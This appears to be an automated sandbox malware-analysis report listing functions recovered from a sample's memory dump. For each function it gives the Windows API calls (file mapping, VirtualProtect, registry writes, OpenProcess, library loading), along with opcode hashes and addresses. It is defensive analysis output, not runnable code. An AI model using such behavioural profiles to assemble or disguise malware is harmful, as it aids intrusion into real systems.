Instruction ID: c7cea81253d66f7bd50f06e34cfe7c115ec777f85f4880e023e803a44655f240
Opcode Fuzzy Hash: 6fe4ac1a8b4fae1f5c82a5e683cdd336e6cb1f41456af2cb2942b12a1134b5fb
Instruction Fuzzy Hash: BC313871A00309DFDF22CFA4C944BEEB7B0BB04356F548528EC19A6291D7BD9D48DB60

Uniqueness

Uniqueness Score: -1.00%

Function 007566D7 Relevance: 7.6, APIs: 5, Instructions: 75fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0076D2DA: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0076D2E6
Part of subcall function 0076D2DA: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0076D2FC
Part of subcall function 0076D2DA: _snwprintf.NTDLL ref: 0076D321
Part of subcall function 0076D2DA: CreateFileMappingW.KERNEL32(000000FF,00778208,00000004,00000000,00001000,?,?,54D38000,00000192), ref: 0076D33D
Part of subcall function 0076D2DA: GetLastError.KERNEL32 ref: 0076D34F
Part of subcall function 0076D2DA: CloseHandle.KERNEL32(00000000), ref: 0076D387

UnmapViewOfFile.KERNEL32(?,?,?), ref: 00756712
CloseHandle.KERNEL32(?), ref: 0075671B
SetEvent.KERNEL32(?,?,?), ref: 00756762
GetLastError.KERNEL32(0075A628,00000000,00000000), ref: 00756791
CloseHandle.KERNEL32(00000000,0075A628,00000000,00000000), ref: 007567A1

Part of subcall function 0075D13A: lstrlenW.KERNEL32(80000001,76B306E0,007721F3,80000001,?,?,007514FC,?), ref: 0075D146
Part of subcall function 0075D13A: memcpy.NTDLL(00000000,00000002,00000000,00000002,?,?,007514FC,?), ref: 0075D16E
Part of subcall function 0075D13A: memset.NTDLL ref: 0075D180

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
String ID:
API String ID: 1106445334-0
Opcode ID: ce3d14c79b2074f94e0e9e85c48b929241dc06a9238ae3c54e17f49d900424be
Instruction ID: 0e6da9b01e613d871025c33890cf23dbd3ef192b03967cc76261653628bdc2b2
Opcode Fuzzy Hash: ce3d14c79b2074f94e0e9e85c48b929241dc06a9238ae3c54e17f49d900424be
Instruction Fuzzy Hash: 82212331600608EFCB10AF78DC59B9A3BA8EF04399B004839F906D3120EBBCED45CB65

Uniqueness

Uniqueness Score: -1.00%

Function 007516B4 Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000000,?,?,007580CF,?,?,?), ref: 007516D2
GetFileSize.KERNEL32(00000000,00000000,?,?,007580CF,?,?,?), ref: 007516E2
ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001,?,?,007580CF,?,?,?), ref: 0075170E
GetLastError.KERNEL32(?,?,007580CF,?,?,?), ref: 00751733
CloseHandle.KERNEL32(000000FF,?,?,007580CF,?), ref: 00751744

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: File$CloseCreateErrorHandleLastReadSize
String ID:
API String ID: 3577853679-0
Opcode ID: d643a395fbad20b251702ab41d197041f4e794113402dcb8fca4b50ff5d49e14
Instruction ID: bee680ae831d68b0137bf70de70968cb56ebb16a442c1de548cb98aebedac69c
Opcode Fuzzy Hash: d643a395fbad20b251702ab41d197041f4e794113402dcb8fca4b50ff5d49e14
Instruction Fuzzy Hash: D111D572100218FBCB201F6CCCC8FEE7A69EB093A3F414925FD1997150D6B89D899650

Uniqueness

Uniqueness Score: -1.00%

Function 00758764 Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C), ref: 00758775
StrRChrA.SHLWAPI(?,00000000,0000002F), ref: 0075878E
StrTrimA.SHLWAPI(?,?), ref: 007587B6
StrTrimA.SHLWAPI(00000000,?), ref: 007587C5
HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 007587FC

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Trim$FreeHeap
String ID:
API String ID: 2132463267-0
Opcode ID: 9d48ecc5d802ca16f7d5ac99e7bf7518f1478f3ed0aa0858b49e8d7025456ccc
Instruction ID: cc441a6b6c85c030cc9684d0fa25e6c7154c3b5fbbf73e9fbc876bc8858eb86d
Opcode Fuzzy Hash: 9d48ecc5d802ca16f7d5ac99e7bf7518f1478f3ed0aa0858b49e8d7025456ccc
Instruction Fuzzy Hash: 1E11B476200205ABE7229798DC85FAB7BACEB08791F104021BE099B250DBB8EC45C751

Uniqueness

Uniqueness Score: -1.00%

Function 00762ED6 Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00000000,00000004,00000040,?,0378F5A8,?,?,?,?,?,0075ECF2,74715520,?,00755124,?,?), ref: 00762F0D
VirtualProtect.KERNEL32(00000000,00000004,?,?,?,0075ECF2,74715520,?,00755124,?,?), ref: 00762F3D
RtlEnterCriticalSection.NTDLL(00778420), ref: 00762F4C
RtlLeaveCriticalSection.NTDLL(00778420), ref: 00762F6A
GetLastError.KERNEL32(?,0075ECF2,74715520,?,00755124,?,?), ref: 00762F7A

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
String ID:
API String ID: 653387826-0
Opcode ID: 4ffbce9d6e790e49caf9759739ef28e2de67483dbe9ac3c02d1856eeb05487d4
Instruction ID: f543e2aa0a9eb18d68016eb83fe26aa3760132853f64df7b52af7275c4adf16a
Opcode Fuzzy Hash: 4ffbce9d6e790e49caf9759739ef28e2de67483dbe9ac3c02d1856eeb05487d4
Instruction Fuzzy Hash: A2212FB5600B06EFC750DFA8C98594ABBF8FF083407008529EA5AD7711D778F944DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00767150 Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00004000,00000000), ref: 0076717E
GetLastError.KERNEL32 ref: 007671A1
WaitForSingleObject.KERNEL32(?,000000FF), ref: 007671B4
GetLastError.KERNEL32 ref: 007671BF
HeapFree.KERNEL32(00000000,00000000), ref: 00767207

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
String ID:
API String ID: 1671499436-0
Opcode ID: 0637d2998798efa5ffcbeef6b9e180483191c72679e03f6bbacf2181f2a21699
Instruction ID: 3f0308cc7a58986df41ae15afc8966d8421c50e7b45363eb31724686f1a4e466
Opcode Fuzzy Hash: 0637d2998798efa5ffcbeef6b9e180483191c72679e03f6bbacf2181f2a21699
Instruction Fuzzy Hash: 34219230604248EBEB298B54DD8CB5A7BB9FB41398F704019F903960A0D77D9E88DB14

Uniqueness

Uniqueness Score: -1.00%

Function 0075BB6B Relevance: 7.6, APIs: 5, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 0075BB7F
memcpy.NTDLL(00000000,007531D1,?,?,00000008,?,?,007531D1,00000000,?,?), ref: 0075BBA8
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000003,00000000,?), ref: 0075BBD1
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000003,00000000,00000000,00000008,?,?,007531D1,00000000,?,?), ref: 0075BBF1
RegCloseKey.ADVAPI32(?,?,?,007531D1,00000000,?,?), ref: 0075BBFC

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Value$AllocateCloseCreateHeapmemcpy
String ID:
API String ID: 2954810647-0
Opcode ID: bde5d004af9d4a75cfc9e6e44452f1b0b014019f76315e02a9054d31be2220f2
Instruction ID: 5c0ea096f9c6f286a275d0d195500759aa6c5be65ac7b1eb25a6fb339165c011
Opcode Fuzzy Hash: bde5d004af9d4a75cfc9e6e44452f1b0b014019f76315e02a9054d31be2220f2
Instruction Fuzzy Hash: 9F11E0B2104209FBDF225F64EC89EFA776DEB44382F004026FD05A21A0DBB98D64D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00753140 Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 0075315D
memcpy.NTDLL(?,?,00000009), ref: 0075317F
RtlAllocateHeap.NTDLL(00000000,00000013), ref: 00753197
lstrlenW.KERNEL32(?,00000001,?), ref: 007531B7
HeapFree.KERNEL32(00000000,00000000,00000000,?,?), ref: 007531DC

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
String ID:
API String ID: 3065863707-0
Opcode ID: efbafa8187ebf1d60d38c83c3ddc3409dbfaaffafa30ea1c82c8ec63cf97728d
Instruction ID: 915b4f8cc61ef4bd4a49c9e12d6a63e4fbdad345982c4f23b33a1b042793bb18
Opcode Fuzzy Hash: efbafa8187ebf1d60d38c83c3ddc3409dbfaaffafa30ea1c82c8ec63cf97728d
Instruction Fuzzy Hash: 8E11D335E0020CFBDB109BA4EC0DFDE7BB8AB08381F008011F909E6291DA78D748DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00758922 Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,?,00000008,00753B81), ref: 0075892C

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

lstrcpy.KERNEL32(00000000,?), ref: 00758950
StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,00000008,00753B81), ref: 00758957
lstrcpy.KERNEL32(00000000,?), ref: 0075899F
lstrcat.KERNEL32(00000000,?), ref: 007589AE

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocateHeaplstrcatlstrlen
String ID:
API String ID: 2616531654-0
Opcode ID: cc59e486bf632cd1bbfc5d397c1b4306e68bc6de9a00af0ac8c0846911298926
Instruction ID: 17458da76a7926999ea8ab7e6433ab194253e35d0ceef4d1a1337216b7fdae7d
Opcode Fuzzy Hash: cc59e486bf632cd1bbfc5d397c1b4306e68bc6de9a00af0ac8c0846911298926
Instruction Fuzzy Hash: BE1191721042069BD7218B65DC88E7BB7EDAB84392F044129FE4996240DF6CED49D727

Uniqueness

Uniqueness Score: -1.00%

Function 0075EE4A Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0076F85D: lstrlen.KERNEL32(?,00000000,?,00000008,007703F4,?,00000000,?,00000000,03F0C2B8,03F0C2B8,77D3EB70,0076C6CE,?,?,?), ref: 0076F869

RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0075EE73
memcpy.NTDLL(00000000,?,?), ref: 0075EE86
RtlEnterCriticalSection.NTDLL(00778448), ref: 0075EE97
RtlLeaveCriticalSection.NTDLL(00778448), ref: 0075EEAC
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0075EEE4

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
String ID:
API String ID: 2349942465-0
Opcode ID: 333828be6f762e1bfaaf12cccedf29d4ed47fe1f4fa326221cda5057abe68d03
Instruction ID: f9ef35fae688fe4cc57315a82f70ea7dedc4120310128921944eb31f7e750a26
Opcode Fuzzy Hash: 333828be6f762e1bfaaf12cccedf29d4ed47fe1f4fa326221cda5057abe68d03
Instruction Fuzzy Hash: C8112572240251EFD7615F24EC4DC6B7B6DEB853A2704803EFC1993220CABD5D48CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0076A4E7 Relevance: 7.6, APIs: 5, Instructions: 57memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(0075C1CF,00000000,?,00000000,?,0076AC04,?,0075C1CF,00000000), ref: 0076A4FD
lstrlen.KERNEL32(?,?,0076AC04,?,0075C1CF,00000000), ref: 0076A504
RtlAllocateHeap.NTDLL(00000000,00000029), ref: 0076A512

Part of subcall function 00755130: GetLocalTime.KERNEL32(?), ref: 0075513A
Part of subcall function 00755130: wsprintfA.USER32 ref: 0075516D

wsprintfA.USER32 ref: 0076A534

Part of subcall function 00761392: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,0076A55C,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 007613B0
Part of subcall function 00761392: wsprintfA.USER32 ref: 007613D5

HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 0076A565

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
String ID:
API String ID: 3847261958-0
Opcode ID: 343e9681fe0ea836476f3c3618235c8bc494e9cd2ec8a4cf3e278c54227d72d3
Instruction ID: 9fde8226324e23552f8fd474143135d2fdd925b815057cf893eeeed4363d33e1
Opcode Fuzzy Hash: 343e9681fe0ea836476f3c3618235c8bc494e9cd2ec8a4cf3e278c54227d72d3
Instruction Fuzzy Hash: A5016531540118BBDB115F65DC09EAA7F69EF843A0B048022FD0E96221D63A9AA5DE64

Uniqueness

Uniqueness Score: -1.00%

Function 0076EEAF Relevance: 7.6, APIs: 5, Instructions: 56COMMON

Download Yara Rule

APIs

ResetEvent.KERNEL32(?,00000008,00000000,0000EA60,00000000,?,?,?,00753C45,00000008,?,00000000,00000000,00000000,00000000), ref: 0076EEEE
ResetEvent.KERNEL32(?,?,00753C45,00000008,?,00000000,00000000,00000000,00000000), ref: 0076EEF3
GetLastError.KERNEL32(00753C45,00000008,?,00000000,00000000,00000000,00000000), ref: 0076EF0E
GetLastError.KERNEL32(0000EA60,00000000,?,?,?,00753C45,00000008,?,00000000,00000000,00000000,00000000), ref: 0076EF3D

Part of subcall function 00771702: lstrlen.KERNEL32(00000000,?,00000000,00000008,00000000,?,00759EF2,?,00000000,00000004,00000000), ref: 0077170E
Part of subcall function 00771702: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,00759EF2,?,00000000,00000004,00000000), ref: 0077176C
Part of subcall function 00771702: lstrcpy.KERNEL32(00000000,00000008), ref: 0077177C

SetEvent.KERNEL32(?,00753C45,00000008,?,00000000,00000000,00000000,00000000), ref: 0076EF2F

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
String ID:
API String ID: 1449191863-0
Opcode ID: 0456057d7c5a5270efa543438bbb6d68d97cb2e3236b0fbeb7bdd99259245e35
Instruction ID: d02ae9538f3ae74b8329a5aad6b7b9d8fb3e79adbd2623d3d81b4e44539bd948
Opcode Fuzzy Hash: 0456057d7c5a5270efa543438bbb6d68d97cb2e3236b0fbeb7bdd99259245e35
Instruction Fuzzy Hash: 69117C36104209EFDB215F64DC48E9B3BA9FF443A4F108620F916810A1D739ED91DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00766FBE Relevance: 7.6, APIs: 5, Instructions: 55memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00004000,-00000008), ref: 00766FD5

Part of subcall function 0076FA00: WaitForSingleObject.KERNEL32(?,00000000,?,00000000), ref: 0076FA17
Part of subcall function 0076FA00: SetEvent.KERNEL32(?), ref: 0076FA27

lstrlen.KERNEL32(?,?,?,?,?,0075C5DC,?,?), ref: 00766FF8
lstrlen.KERNEL32(?,?,?,?,0075C5DC,?,?), ref: 00767002
memcpy.NTDLL(?,?,00004000,?,?,0075C5DC,?,?), ref: 00767013
HeapFree.KERNEL32(00000000,?,?,?,?,0075C5DC,?,?), ref: 00767035

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heaplstrlen$AllocateEventFreeObjectSingleWaitmemcpy
String ID:
API String ID: 442095154-0
Opcode ID: 7e3c4241a7790c2e66043af613e7791919d748ed982be42d69928940931294a0
Instruction ID: a8ebd23129bde5a73d8e999a7d63cb643b8f702636be7a236a23f4e70723cbd4
Opcode Fuzzy Hash: 7e3c4241a7790c2e66043af613e7791919d748ed982be42d69928940931294a0
Instruction Fuzzy Hash: BB11A175500204FFDB169F64EC49E5EBBB5EB853A4F208065FD0AA3220E739DE44DB24

Uniqueness

Uniqueness Score: -1.00%

Function 00756DB3 Relevance: 7.5, APIs: 5, Instructions: 45libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00756DD3
GetModuleHandleA.KERNEL32 ref: 00756DE1
LoadLibraryExW.KERNEL32(?,?,?), ref: 00756DEE
GetModuleHandleA.KERNEL32 ref: 00756E05
GetModuleHandleA.KERNEL32 ref: 00756E11

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: HandleModule$LibraryLoad
String ID:
API String ID: 1178273743-0
Opcode ID: 0c44fbf9e72a42c819615a7d81618628ea0da22df01c5033ca4132a088b357bf
Instruction ID: 6298c85b674ed37e4f0039ce97ff6c7244fb812c9386a1bb4b50b47eddb2d418
Opcode Fuzzy Hash: 0c44fbf9e72a42c819615a7d81618628ea0da22df01c5033ca4132a088b357bf
Instruction Fuzzy Hash: C701D63430130A9B9F015F69EC0196A3FA9FF143A13408036FD18C2130DBBACC25DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0076496E Relevance: 7.5, APIs: 5, Instructions: 42stringCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(00000000,0000003D,00000000,00000000,?,00762575), ref: 00764974
StrTrimA.SHLWAPI(00000001,?,?,00762575), ref: 00764997
StrTrimA.SHLWAPI(00000000,?,?,00762575), ref: 007649A6
_strupr.NTDLL ref: 007649A9
lstrlen.KERNEL32(00000000,00762575), ref: 007649B1

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Trim$_struprlstrlen
String ID:
API String ID: 2280331511-0
Opcode ID: 747119d6885df726b8ef6980394071a59678cd14977f3550d0531fb5f1858d2e
Instruction ID: 76387bd965997b3a0861a2209a12e2243eb9d0f8e1cd7f33a32d2f6cc34b24fd
Opcode Fuzzy Hash: 747119d6885df726b8ef6980394071a59678cd14977f3550d0531fb5f1858d2e
Instruction Fuzzy Hash: CDF0CD71200115AFE2069B24EC8CF7B77ACEB4A691B008019F90DCB390DF2C9C42C76A

Uniqueness

Uniqueness Score: -1.00%

Function 00770E50 Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0076D1FC,?), ref: 00770E58
GetVersion.KERNEL32 ref: 00770E67
GetCurrentProcessId.KERNEL32 ref: 00770E83
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00770EA0
GetLastError.KERNEL32 ref: 00770EBF

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: c3cd86277b5524cf1f73dbd5bbfaeee1dcbfdd01f5723fdfd91b891dc2eca713
Instruction ID: 1e77a4a431245ddb9fa25956ae18491659f4c48d4ef9216d91132ae28b4d0800
Opcode Fuzzy Hash: c3cd86277b5524cf1f73dbd5bbfaeee1dcbfdd01f5723fdfd91b891dc2eca713
Instruction Fuzzy Hash: 41F08C30684309DBDBA0AB24AC1DB253B61B7067C1F50CA1DE54EC62E0DBBD85C2CA5E

Uniqueness

Uniqueness Score: -1.00%

Function 00770A17 Relevance: 7.5, APIs: 5, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00770A24
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040), ref: 00770A34
CloseHandle.KERNEL32(00000000,?,?,00000040), ref: 00770A3D
VirtualFree.KERNEL32(00002710,00000000,00008000,?,?,00764947,?,?,00000040), ref: 00770A5B
VirtualFree.KERNEL32(00000001,00000000,00008000,?,?,00764947,?,?,00000040), ref: 00770A68

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
String ID:
API String ID: 3667519916-0
Opcode ID: b5932dc02789e2ac0b346f3142070a61a525d694410b4a2a6aa56c1fd2ab1093
Instruction ID: f25a5f01d6120677c74716a0dce28be09393433b0fab0e0b4f1760adc375248a
Opcode Fuzzy Hash: b5932dc02789e2ac0b346f3142070a61a525d694410b4a2a6aa56c1fd2ab1093
Instruction Fuzzy Hash: 73F09A31200B00EFEA206B74DC48F16B3A8BF54391F10C614F54A825E0CB28ED45CE64

Uniqueness

Uniqueness Score: -1.00%

Function 00766B31 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62memorysynchronizationCOMMON

Download Yara Rule

APIs

UnregisterWait.KERNEL32(?), ref: 00766B62
WaitForSingleObject.KERNEL32(00000064,?,?,?,00000000), ref: 00766BB3
HeapFree.KERNEL32(00000000,?), ref: 00766BCF

Strings

"w, xrefs: 00766B59

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Wait$FreeHeapObjectSingleUnregister
String ID: "w
API String ID: 3104896675-2380412451
Opcode ID: d66f95451189516a71542efba740a222d1ce1fde61ee51052c98556f0a8c9351
Instruction ID: 50bba2c4b0f573e3bab9d84ed23b8879b35b4ec43c1025ce9e3ae0c26051fce7
Opcode Fuzzy Hash: d66f95451189516a71542efba740a222d1ce1fde61ee51052c98556f0a8c9351
Instruction Fuzzy Hash: 4611B172200604EFD7215F18DC09F12B7B6EB40360F108529F5AEC21B0DBB9AD95CF48

Uniqueness

Uniqueness Score: -1.00%

Function 007560A5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 007560BB
wsprintfA.USER32 ref: 007560FC
GetModuleHandleA.KERNEL32(00000000), ref: 0075610E

Strings

F(w, xrefs: 0075611E

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CountHandleModuleTickwsprintf
String ID: F(w
API String ID: 218054273-409625173
Opcode ID: c400903b5d9afcf633ab29e8f33e0b5b01c8026d3974269120af6fefbc4b5332
Instruction ID: c31c571cc09bbcf3a94dbfd3c6da28d84ca31c43048be327096239266be272e4
Opcode Fuzzy Hash: c400903b5d9afcf633ab29e8f33e0b5b01c8026d3974269120af6fefbc4b5332
Instruction Fuzzy Hash: 71010972900119FFCB11DB95DC48AEEBBB8EF48315F004056FA09A6150E7785A85DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0077036C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(d&v,00000000,00000000,?,?,?,00762664,?), ref: 00770378

Part of subcall function 007632BD: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,775EC740,00777068,0076C4FB,00000001,00000000,03F0C314,0077706E,00000000,775EC740,0076EF5B,03F0C314,00000000,00000000), ref: 00763311
Part of subcall function 007632BD: RegSetValueExA.KERNEL32(00777068,00000003,00000000,00000003,00777068,00000028), ref: 00763352
Part of subcall function 007632BD: RegCloseKey.ADVAPI32(?), ref: 0076335E

Part of subcall function 0075C304: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 0075C396

ResetEvent.KERNEL32(?,?,?,?,00762664,?), ref: 007703C0

Part of subcall function 00767702: StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,76B324D0,74714D40,?,007691EF,00000000,00000000,0075AE17,?,00000000), ref: 0076773A
Part of subcall function 00767702: StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,76B324D0,74714D40,?,007691EF,00000000,00000000,0075AE17,?,00000000), ref: 0076776C
Part of subcall function 00767702: StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,76B324D0,74714D40,?,007691EF,00000000,00000000,0075AE17,?,00000000), ref: 0076779E
Part of subcall function 00767702: StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,76B324D0,74714D40,?,007691EF,00000000,00000000,0075AE17,?,00000000), ref: 007677D0
Part of subcall function 00767702: StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,76B324D0,74714D40,?,007691EF,00000000,00000000,0075AE17,?,00000000), ref: 00767802

HeapFree.KERNEL32(00000000,?,?,?,?,?,00762664,?), ref: 007703A6

Strings

d&v, xrefs: 00770375

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: FreeHeapValue$CloseEventObjectQueryResetSingleWait
String ID: d&v
API String ID: 4242254246-3391614403
Opcode ID: 7523d6b4631204a713c9eb001b2242167b4ed099d3b12898f333743d8559ab09
Instruction ID: 1e74dba91417628645f065d2a1c50ef7686afc32ecb9bbbd86fb27a9896a68e1
Opcode Fuzzy Hash: 7523d6b4631204a713c9eb001b2242167b4ed099d3b12898f333743d8559ab09
Instruction Fuzzy Hash: 88F03A71200228FBCF156BA5DD0E99B7E69EF017C57408025B90A91021EB398E54E6A5

Uniqueness

Uniqueness Score: -1.00%

Function 00757EEB Relevance: 6.3, APIs: 5, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 00757F48
HeapFree.KERNEL32(00000000,?), ref: 00757F59
HeapFree.KERNEL32(00000000,?), ref: 00757F71
CloseHandle.KERNEL32(?), ref: 00757F8B
HeapFree.KERNEL32(00000000,?), ref: 00757FA0

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: 7a6deac52f06f393d3d29d97d230ff9207667ff6839141349697b3e43bbd1238
Instruction ID: 224c0a4444498cecd3b3203f0c9fabfc35f348fdf686d3e59ef18898f03f0af6
